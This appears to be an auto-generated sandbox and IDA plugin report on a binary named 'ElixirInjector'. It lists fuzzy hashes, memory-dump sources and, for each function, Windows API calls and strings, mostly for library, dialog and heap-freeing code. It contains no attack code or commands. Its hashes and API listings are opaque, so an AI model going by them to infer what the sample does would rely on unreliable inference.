Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: 57b2bebcfaf26187d4be23ca04f929b9054eb0c9d2f3b389f9d9a7a50696aa4e
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: 519187B16003558BDB25EE64EC90BFA77C4EBA0310F10092CF596C72C2DAB8B985E752

Function 00F243BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 3733d631ed84fb82169a2d02b4f05504463d2550fb7e6c14e51d3f9039ca50cd
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 55817D717043624BDB25EF68ECD1BBD77D0EB90314F04092DE9C68B282DAF4A985A752

Function 00F351C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065055e83e4919c833d69efa84b02f975daffe91da080f284ba490589a2bb6d2
Instruction ID: 8f19e4623e4c06fc2be0dde0f6a12c580abb397e349b5f9cdf93e85d797b4b5c
Opcode Fuzzy Hash: 065055e83e4919c833d69efa84b02f975daffe91da080f284ba490589a2bb6d2
Instruction Fuzzy Hash: BC617A72E00F0857DE389A68AC95BBF7395EBC1F70F140519E843DF281D655ED42B251

Function 00F34F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 3847ecb5fcc9c6d363eb2ff0955f5422a897841cfae31d160b2e361938d9e035
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 105139A1A04F4657DF3C55788955BBF73C59BC1F74F180819E842CB282C60AFD45B3A1

Function 00F1EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca87f438b46879f2611893d6ab0d2b5ccc267d64883ce0f95c0c4c72d2d8d65
Instruction ID: b67e1fa4b460672bb5c44638224fa09282dada1f650c1ca734d5cf9a3e80d6f6
Opcode Fuzzy Hash: 7ca87f438b46879f2611893d6ab0d2b5ccc267d64883ce0f95c0c4c72d2d8d65
Instruction Fuzzy Hash: A151D8715083D55FC711CF38C5404AEBFE0AF9A324F4909ADE4D95B243C221DA8EEB62

Function 00F200B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dde62156eb68af52c22b8b77db172ca856238faef792bf55335cfd322c596c1
Instruction ID: 901209fba3322f346430ab51747566adecc324d6f1a99a180ea690d5a4b24026
Opcode Fuzzy Hash: 2dde62156eb68af52c22b8b77db172ca856238faef792bf55335cfd322c596c1
Instruction Fuzzy Hash: A251DFB2A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3341DB34E959CB96

Function 00F23E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 00f0dcbc3713104aa24bb573dc9cec2ffe8c80fe0a0d138327aa8f61325d258d
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 613107B1A147568FCB18DF28DC512AABBE0FB95314F10452DE495C7341C73CEA4ADB91

Function 00F1E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00F1E30E

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

Part of subcall function 00F21DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00F51030,?,00F1D928,00000000,?,00000050,00F51030), ref: 00F21DC4

_strlen.LIBCMT ref: 00F1E32F
SetDlgItemTextW.USER32(?,00F4E274,?), ref: 00F1E38F
GetWindowRect.USER32(?,?), ref: 00F1E3C9
GetClientRect.USER32(?,?), ref: 00F1E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00F1E475
GetWindowRect.USER32(?,?), ref: 00F1E4A2
SetWindowTextW.USER32(?,?), ref: 00F1E4DB
GetSystemMetrics.USER32(00000008), ref: 00F1E4E3
GetWindow.USER32(?,00000005), ref: 00F1E4EE
GetWindowRect.USER32(00000000,?), ref: 00F1E51B
GetWindow.USER32(00000000,00000002), ref: 00F1E58D

Strings

d, xrefs: 00F1E3F5
$%s:, xrefs: 00F1E302
CAPTION, xrefs: 00F1E4BD

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: a51b84887e7ee6de614f3017617e0952a1c7945524911b32833b0cc8c1f20083
Instruction ID: 47aa8d9360011abd9ba664805b95a1d63dfe7267df74a9bbba8fad55ada3bf38
Opcode Fuzzy Hash: a51b84887e7ee6de614f3017617e0952a1c7945524911b32833b0cc8c1f20083
Instruction Fuzzy Hash: BE81A271608305AFD710DF68CC89AAFBBE9FBC8714F04091DFA88D7290D674E945AB52

Function 00F3CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00F3CB66

Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C71E
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C730
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C742
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C754
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C766
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C778
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C78A
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C79C
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C7AE
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C7C0
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C7D2
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C7E4
Part of subcall function 00F3C701: _free.LIBCMT ref: 00F3C7F6

_free.LIBCMT ref: 00F3CB5B

Part of subcall function 00F38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?), ref: 00F38DE2
Part of subcall function 00F38DCC: GetLastError.KERNEL32(?,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?,?), ref: 00F38DF4

_free.LIBCMT ref: 00F3CB7D
_free.LIBCMT ref: 00F3CB92
_free.LIBCMT ref: 00F3CB9D
_free.LIBCMT ref: 00F3CBBF
_free.LIBCMT ref: 00F3CBD2
_free.LIBCMT ref: 00F3CBE0
_free.LIBCMT ref: 00F3CBEB
_free.LIBCMT ref: 00F3CC23
_free.LIBCMT ref: 00F3CC2A
_free.LIBCMT ref: 00F3CC47
_free.LIBCMT ref: 00F3CC5F

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d3666566c8e84db34149f9076a207fbe06dee77406835a0a349785621d84f446
Instruction ID: 7988f6434d6f232efbd93d0f2941c63e1761a05166dccca4c89d1685fb81f303
Opcode Fuzzy Hash: d3666566c8e84db34149f9076a207fbe06dee77406835a0a349785621d84f446
Instruction Fuzzy Hash: 54315E31A003459FEB21AA38DC46B5AB7F9AF507B0F105419F588E7192DF39EC42EB90

Function 00F29711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F29736
_wcslen.LIBCMT ref: 00F297D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00F297E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F29806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F2982D

Strings

</html>, xrefs: 00F297B7
<html>, xrefs: 00F29755, 00F2978E
utf-8"></head>, xrefs: 00F2976B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00F29760

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: de452359a67f6dbcb56a091788cd8141366e57cb2f331f1912a4f54c1a71e206
Instruction ID: 99e82f2cc271b6ccebd1f8d8fa5f5b5859011f5715fa64fac65828b3a832d81c
Opcode Fuzzy Hash: de452359a67f6dbcb56a091788cd8141366e57cb2f331f1912a4f54c1a71e206
Instruction Fuzzy Hash: BA312C3250C7257BD725AF64AC06F9B7B98EF52330F14011DF901971D1EBA8DA48A3A6

Function 00F2D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00F2D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00F2D6ED

Part of subcall function 00F21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F1C116,00000000,.exe,?,?,00000800,?,?,?,00F28E3C), ref: 00F21FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00F2D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F2D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00F2D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F2D75D
DeleteObject.GDI32(00000000), ref: 00F2D764
GetWindow.USER32(00000000,00000002), ref: 00F2D76D

Strings

STATIC, xrefs: 00F2D6F3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 5c4e658405a1765bbc269fa6ce56c6383083a6c37605e6dd886dff6144efcb4b
Instruction ID: 97541a2d9180e3a28b10583b81a2e5afd8bef7fa97bcdca995ea5dd6d15074b1
Opcode Fuzzy Hash: 5c4e658405a1765bbc269fa6ce56c6383083a6c37605e6dd886dff6144efcb4b
Instruction Fuzzy Hash: E31124329443347BE6206B70BC4AFAF7A5CAB54721F004120FA45E2091DA788E8572A6

Function 00F396F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F39705

Part of subcall function 00F38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?), ref: 00F38DE2
Part of subcall function 00F38DCC: GetLastError.KERNEL32(?,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?,?), ref: 00F38DF4

_free.LIBCMT ref: 00F39711
_free.LIBCMT ref: 00F3971C
_free.LIBCMT ref: 00F39727
_free.LIBCMT ref: 00F39732
_free.LIBCMT ref: 00F3973D
_free.LIBCMT ref: 00F39748
_free.LIBCMT ref: 00F39753
_free.LIBCMT ref: 00F3975E
_free.LIBCMT ref: 00F3976C

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0da12c48a9d3e672afc9557af92214f7d019cd2ac9deb79c5c3a3a9c9489f287
Instruction ID: 0efb3bcb69d33209bf6e93df14c2a6764260f66616baeea16443cbd6ab81c73e
Opcode Fuzzy Hash: 0da12c48a9d3e672afc9557af92214f7d019cd2ac9deb79c5c3a3a9c9489f287
Instruction Fuzzy Hash: 2711A476510209AFCB01EF54CC42CD93BB5EF147A0F5154A1FA088F262DE7ADE52AB84

Function 00F32E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F32F50
___TypeMatch.LIBVCRUNTIME ref: 00F3305E
_UnwindNestedFrames.LIBCMT ref: 00F331B0
CallUnexpected.LIBVCRUNTIME ref: 00F331CB
_abort.LIBCMT ref: 00F331D0

Strings

csm, xrefs: 00F32E6E
csm, xrefs: 00F32F87
csm, xrefs: 00F32EDB

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 24d0cf5b57c7042bc6b9974e18163865c7e582974041bf09c88a4a862c144f0a
Instruction ID: b621529cd8ca9060595edbc7713b0e1f8c8bcfec558cb44efe8dedc4a3ca13d9
Opcode Fuzzy Hash: 24d0cf5b57c7042bc6b9974e18163865c7e582974041bf09c88a4a862c144f0a
Instruction Fuzzy Hash: C5B13771D00209EFCF29EFA4CC819AEBBB5BF14334F14415AE8156B212D739DA51EBA1

Function 00F16FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F16FAA
_wcslen.LIBCMT ref: 00F17013
_wcslen.LIBCMT ref: 00F17084

Part of subcall function 00F17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F17AAB
Part of subcall function 00F17A9C: GetLastError.KERNEL32 ref: 00F17AF1
Part of subcall function 00F17A9C: CloseHandle.KERNEL32(?), ref: 00F17B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00F16FCC
\??\, xrefs: 00F1702B
SeRestorePrivilege, xrefs: 00F16FC2
UNC\, xrefs: 00F17051

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: ca7c4666cadd71779400ed08c828de31df43a90efdf0235fbbdba522ba0308ac
Instruction ID: d63d11b517597e2720fa71a888e3680d1981eec1bb5ec3c3fc610f6cbc96ec09
Opcode Fuzzy Hash: ca7c4666cadd71779400ed08c828de31df43a90efdf0235fbbdba522ba0308ac
Instruction Fuzzy Hash: 6E41E5B1D08344BAEB20F7709C82FEEB77C9F04314F004455FA59A6182D778AAC8BB61

Function 00F2B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

EndDialog.USER32(?,00000001), ref: 00F2B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00F2B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F2B650
SetWindowTextW.USER32(?,?), ref: 00F2B661
GetDlgItem.USER32(?,00000065), ref: 00F2B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F2B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F2B694

Strings

LICENSEDLG, xrefs: 00F2B5D4

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: dfaff72213ce4d9fa71fd306480976b06ae507825ca73b1ac7384deebb61d46a
Instruction ID: a32e072c43250009f39f8df8ac970e2c5f495e1458095b3e49638f6f97d6d62a
Opcode Fuzzy Hash: dfaff72213ce4d9fa71fd306480976b06ae507825ca73b1ac7384deebb61d46a
Instruction Fuzzy Hash: 3921F73260422DBBD2119FA5FC49F7B3F6DFB4AB55F010014FA04E21A1CB969A41F632

Function 00F2FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,156392B9,00000001,00000000,00000000,?,?,00F1AF6C,ROOT\CIMV2), ref: 00F2FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00F1AF6C,ROOT\CIMV2), ref: 00F2FE14
SysAllocString.OLEAUT32(00000000), ref: 00F2FE1F
_com_issue_error.COMSUPP ref: 00F2FE48
_com_issue_error.COMSUPP ref: 00F2FE52
GetLastError.KERNEL32(80070057,156392B9,00000001,00000000,00000000,?,?,00F1AF6C,ROOT\CIMV2), ref: 00F2FE57
_com_issue_error.COMSUPP ref: 00F2FE6A
GetLastError.KERNEL32(00000000,?,?,00F1AF6C,ROOT\CIMV2), ref: 00F2FE80
_com_issue_error.COMSUPP ref: 00F2FE93

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

